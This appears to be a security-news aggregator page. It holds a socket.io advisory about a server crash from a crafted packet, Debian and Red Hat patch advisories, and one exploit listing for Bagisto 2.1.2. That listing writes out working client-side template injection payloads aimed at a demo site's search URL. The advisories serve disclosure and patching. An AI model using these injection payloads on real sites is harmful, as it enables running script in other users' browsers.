### Impact

A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.

```
node:events:502
    throw err; // Unhandled 'error' event
    ^

Error [ERR_UNHANDLED_ERROR]: Unhandled error. (undefined)
    at new NodeError (node:internal/errors:405:5)
    at Socket.emit (node:events:500:17)
    at /myapp/node_modules/socket.io/lib/socket.js:531:14
    at process.processTicksAndRejections (node:internal/process/task_queues:77:11) {
  code: 'ERR_UNHANDLED_ERROR',
  context: undefined
}
```

### Affected versions

| Version range    | Needs minor update?                            |
|------------------|------------------------------------------------|
| `4.6.2...latest` | Nothing to do               |
| `3.0.0...4.6.1`  | Please upgrade to `socket.io@4.6.2` (at least) |
| `2.3.0...2.5.0`  | Please upgrade to `socket.io@2.5.1`            |

### Patches

This issue is fixed by https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115, included in `socket.io@4.6.2` (released in May 2023).

The fix was backported in the 2.x branch today: https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c

### Workarounds

As a workaround for the affected versions of the `socket.io` package, you can attach a listener for the "error" event:

```js
io.on("connection", (socket) => {
  socket.on("error", () => {
    // ...
  });
});
```

### For more information

If you have any questions or comments about this advisory:

- Open a discussion [here](https://github.com/socketio/socket.io/discussions)

Thanks a lot to [Paul Taylor](https://github.com/Y0ursTruly) for the responsible disclosure.

### References

- https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115
- https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c


**Impact**

A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.

    node:events:502
        throw err; // Unhandled 'error' event
        ^
    
    Error [ERR_UNHANDLED_ERROR]: Unhandled error. (undefined)
        at new NodeError (node:internal/errors:405:5)
        at Socket.emit (node:events:500:17)
        at /myapp/node_modules/socket.io/lib/socket.js:531:14
        at process.processTicksAndRejections (node:internal/process/task_queues:77:11) {
      code: 'ERR_UNHANDLED_ERROR',
      context: undefined
    }
    

**Affected versions**

Version range

Needs minor update?

4.6.2...latest

Nothing to do

3.0.0...4.6.1

Please upgrade to socket.io@4.6.2 (at least)

2.3.0...2.5.0

Please upgrade to socket.io@2.5.1

**Patches**

This issue is fixed by socketio/socket.io@15af22f, included in socket.io@4.6.2 (released in May 2023).

The fix was backported in the 2.x branch today: socketio/socket.io@d30630b

**Workarounds**

As a workaround for the affected versions of the socket.io package, you can attach a listener for the "error" event:

io.on("connection", (socket) \=> {
  socket.on("error", () \=> {
    // ...
  });
});

**For more information**

If you have any questions or comments about this advisory:

*   Open a discussion here

Thanks a lot to Paul Taylor for the responsible disclosure.

**References**

*   socketio/socket.io@15af22f
*   socketio/socket.io@d30630b

**References**

*   GHSA-25hc-qcg6-38wj
*   socketio/socket.io@15af22f
*   socketio/socket.io@d30630b

GHSA-25hc-qcg6-38wj: socket.io has an unhandled 'error' event

Debian Linux Security Advisory 5715-1 - Two vulnerabilities have been discovered in Composer, a dependency manager for PHP, which could result in arbitrary command execution by operating on malicious git/hg repositories.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5715-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 18, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : composerCVE ID         : CVE-2024-35241 CVE-2024-35242Two vulnerabilities have been discovered in Composer, a dependencymanager for PHP, which could result in arbitrary command execution byoperating on malicious git/hg repositories.For the oldstable distribution (bullseye), these problems have been fixedin version 2.0.9-2+deb11u3.For the stable distribution (bookworm), these problems have been fixed inversion 2.5.5-1+deb12u2.We recommend that you upgrade your composer packages.For the detailed security status of composer please refer toits security tracker page at:https://security-tracker.debian.org/tracker/composerFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZyAQwACgkQEMKTtsN8TjYxTw//by7RwssfrKcrNXWHLSJjcCJLtIUfDCzp31pxo9z1uc2viR1QYgfGgIB6yuUtjY0j8KDVBnvlpo8CTlt9Z5auzgQ0poGzshgKlvFcMwhzt7wQJtoF/mlO1dlABUcUyZvv8YLyKA4oYfRIN9bLSsldTb6gSV1bBTVLZeCggWb69HsFHrDxGmpKbcX43a+QL+qkScNu6wm7AdEG6RHDwJTJuFh72RjsONrg172i/6zL8wVqbGEg1HRYiFCCTYTniZsTi1eqQRSNzqIrq61Z/PFHhE7IS7DpNLF+8nVdTFAolou89/VTJSXO/nQCKR0MN/xHlctKY7wDj4lM3IrqNY0RoG1s4V/EiUz9fzdBitFvozPXgf45h45ETfv77NVw8quKrIQGKUNRtRBoemqHJ3J6ZpmGHyR5MRBjLdlZqnY0LtIq5dbj/AZJE48twaKbP8KsV6Yt7CtXe/c6zbqlRjZsV4p+4qOQtDuSqO751k3gWSLMtgogT4cmKLRuhhobe/zInQIsiUKcAmYiUcTjv2BXnSz2XYNfBn4Sd4/J2Bn+vMRMlLPOj7U3ZOIzZr5gWnSoJrUQEj68icbYHLG2jVGxLpZ+N3YlGEd+V+5N5sklR6Ggy5RjgPCB7at284WtvfU0EggKpgWhjoDx273K/EIVEAaEpvIUe3mhle1Tj3cdeYo==oulZ-----END PGP SIGNATURE-----

Debian Security Advisory 5715-1

Bagisto version 2.1.2 suffers from a client-side template injection vulnerability.

    # Exploit Title: Bagisto 2.1.2 Client-Side Template Injection(CSTI) (VueJS)# Date: 06/18/2024# Exploit Author: tmrswrr# Vendor Homepage: https://forums.bagisto.com/# Version: 2.1.2# Tested on: https://demo.bagisto.com/https://demo.bagisto.com/bagisto-common/search?query={{7*7}}49https://demo.bagisto.com/bagisto-common/search?query={{'a'.toUpperCase()}}Ahttps://demo.bagisto.com/bagisto/search?query={{ Object.keys(this) }}[ "_", "onSubmit", "onInvalidSubmit", "lazyImages", "animateBoxes" ]> Payloads for VueJS 3https://demo.bagisto.com/bagisto/search?query={{_openBlock.constructor('alert(1)')()}}https://demo.bagisto.com/bagisto/search?query={{-function(){this.alert(1)}()}}> You will be see alert button

Bagisto 2.1.2 Client-Side Template Injection

CrowdStrike discovered that roundcube, a skinnable AJAX based webmail solution for IMAP servers, did not correctly process and sanitize requests. This would allow an attacker to perform Cross-Side Scripting (XSS) attacks.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5714-1                   security@debian.orghttps://www.debian.org/security/                       Sebastien DelafondJune 18, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : roundcubeCVE ID         : CVE-2024-37383 CVE-2024-37384Debian Bug     : 1071474Huy Nguyễn Phạm Nhật, and Valentin T. and Lutz Wolf of CrowdStrike,discovered that roundcube, a skinnable AJAX based webmail solution forIMAP servers, did not correctly process and sanitize requests. Thiswould allow an attacker to perform Cross-Side Scripting (XSS) attacks.For the oldstable distribution (bullseye), these problems have been fixedin version 1.4.15+dfsg.1-1+deb11u3.For the stable distribution (bookworm), these problems have been fixed inversion 1.6.5+dfsg-1+deb12u2.We recommend that you upgrade your roundcube packages.For the detailed security status of roundcube please refer toits security tracker page at:https://security-tracker.debian.org/tracker/roundcubeFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmZxxS4ACgkQEL6Jg/PVnWSmBAgAlHkpKAMLQuMJh79XHBJD38gMRshGMgxGMmbD38uZBRGhxniE8CSP3Xc2h/92qvSVcNJrjS8H0wPlkhKEV75NoNoofoDVb/Uoa1GcAShVb0pzBDzmBA1hbbdzCHfpGUnu8ghkzh1bBgX/zAwqScXcAGSn1/s4bknhPgEriRvfcAjN7o4S4lFOExSLL+RlqxWfHFNiQt6788BpgnfGZ3OWgAEWoEJdH7wr6/YdH5u/Fne6/1gD2HO3zYHVF4OzuVVkX6fTf+kHH74oGOSz7qtqW7HiriGY6+7j+7i+vSk95aWuxhPrPaGD3yVI02WjtokupJJKmgGVUf3CgNJCMEzCqg===rv9C-----END PGP SIGNATURE-----

Debian Security Advisory 5714-1

Red Hat Security Advisory 2024-3980-03 - An update for flatpak is now available for Red Hat Enterprise Linux 7.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3980.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: flatpak security updateAdvisory ID:        RHSA-2024:3980-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3980Issue date:         2024-06-18Revision:           03CVE Names:          CVE-2024-32462====================================================================Summary: An update for flatpak is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Flatpak is a system for building, distributing, and running sandboxed desktopapplications on Linux.Security Fix(es):* flatpak: sandbox escape via RequestBackground portal (CVE-2024-32462)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-32462References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2275981

Red Hat Security Advisory 2024-3980-03

Red Hat Security Advisory 2024-3979-03 - An update for flatpak is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3979.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: flatpak security updateAdvisory ID:        RHSA-2024:3979-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3979Issue date:         2024-06-18Revision:           03CVE Names:          CVE-2024-32462====================================================================Summary: An update for flatpak is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Flatpak is a system for building, distributing, and running sandboxed desktop applications on Linux.Security Fix(es):* flatpak: sandbox escape via RequestBackground portal (CVE-2024-32462)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-32462References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2275981

Red Hat Security Advisory 2024-3979-03

Red Hat Security Advisory 2024-3889-03 - Red Hat OpenShift Container Platform release 4.15.18 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3889.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.15.18 security update  
Advisory ID:        RHSA-2024:3889-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3889  
Issue date:         2024-06-19  
Revision:           03  
CVE Names:          CVE-2023-45288  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.15.18 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.15.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.15.18. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2024:3892

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.15/release_notes/ocp-4-15-release-notes.html

Security Fix(es):

* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames  
causes DoS (CVE-2023-45288)  
* go-git: Maliciously crafted Git server replies can cause DoS on go-git  
clients (CVE-2023-49568)  
* cluster-image-registry-operator: Exposes a secret via env variable in pod  
definition on Azure (CVE-2024-4369)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  
All OpenShift Container Platform 4.15 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.15/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-45288

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2258165  
https://bugzilla.redhat.com/show_bug.cgi?id=2268273  
https://bugzilla.redhat.com/show_bug.cgi?id=2278035  
https://issues.redhat.com/browse/OCPBUGS-28928  
https://issues.redhat.com/browse/OCPBUGS-29361  
https://issues.redhat.com/browse/OCPBUGS-30208  
https://issues.redhat.com/browse/OCPBUGS-31461  
https://issues.redhat.com/browse/OCPBUGS-32029  
https://issues.redhat.com/browse/OCPBUGS-32092  
https://issues.redhat.com/browse/OCPBUGS-33206  
https://issues.redhat.com/browse/OCPBUGS-33526  
https://issues.redhat.com/browse/OCPBUGS-33736  
https://issues.redhat.com/browse/OCPBUGS-34423  
https://issues.redhat.com/browse/OCPBUGS-34641  
https://issues.redhat.com/browse/OCPBUGS-34732  
https://issues.redhat.com/browse/OCPBUGS-34843  
https://issues.redhat.com/browse/OCPBUGS-34868  
https://issues.redhat.com/browse/OCPBUGS-34887  
https://issues.redhat.com/browse/OCPBUGS-34997  
https://issues.redhat.com/browse/OCPBUGS-35002  
https://issues.redhat.com/browse/OCPBUGS-35010  
https://issues.redhat.com/browse/OCPBUGS-35059  
https://issues.redhat.com/browse/OCPBUGS-35074  
https://issues.redhat.com/browse/OCPBUGS-35229  
https://issues.redhat.com/browse/OCPBUGS-35255

Red Hat Security Advisory 2024-3889-03

Red Hat Security Advisory 2024-3885-03 - Red Hat OpenShift Container Platform release 4.13.44 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3885.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.13.44 bug fix and security update  
Advisory ID:        RHSA-2024:3885-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3885  
Issue date:         2024-06-19  
Revision:           03  
CVE Names:          CVE-2022-21708  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.13.44 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.13.

Red Hat Product Security has rated this update as having a security impact of  Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.13.44. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2024:3887

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

Security Fix(es):

* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames  
causes DoS (CVE-2023-45288)  
* graphql-go: Denial of service via stack overflow panics (CVE-2022-21708)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.13 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

Solution:

CVEs:

CVE-2022-21708

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2045014  
https://bugzilla.redhat.com/show_bug.cgi?id=2268273  
https://issues.redhat.com/browse/OCPBUGS-24395  
https://issues.redhat.com/browse/OCPBUGS-33777  
https://issues.redhat.com/browse/OCPBUGS-33978  
https://issues.redhat.com/browse/OCPBUGS-33990  
https://issues.redhat.com/browse/OCPBUGS-34342  
https://issues.redhat.com/browse/OCPBUGS-34409  
https://issues.redhat.com/browse/OCPBUGS-34765  
https://issues.redhat.com/browse/OCPBUGS-35094  
https://issues.redhat.com/browse/OCPBUGS-35241

Red Hat Security Advisory 2024-3885-03

Red Hat Security Advisory 2024-1482-03 - An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 7 Supplementary.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1482.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: java-1.8.0-ibm security updateAdvisory ID:        RHSA-2024:1482-03Product:            Red Hat Enterprise Linux SupplementaryAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1482Issue date:         2024-06-19Revision:           03CVE Names:          CVE-2024-20918====================================================================Summary: An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 7 Supplementary.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.This update upgrades IBM Java SE 8 to version 8 SR8-FP15.Security Fix(es):For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-20918References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2024-1482-03

Red Hat Security Advisory 2024-1481-03 - An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1481.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: java-1.8.0-ibm security updateAdvisory ID:        RHSA-2024:1481-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1481Issue date:         2024-06-19Revision:           03CVE Names:          CVE-2024-20918====================================================================Summary: An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.This update upgrades IBM Java SE 8 to version 8 SR8-FP15.Security Fix(es):For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-20918References:https://access.redhat.com/security/updates/classification/#moderate

Tag

#js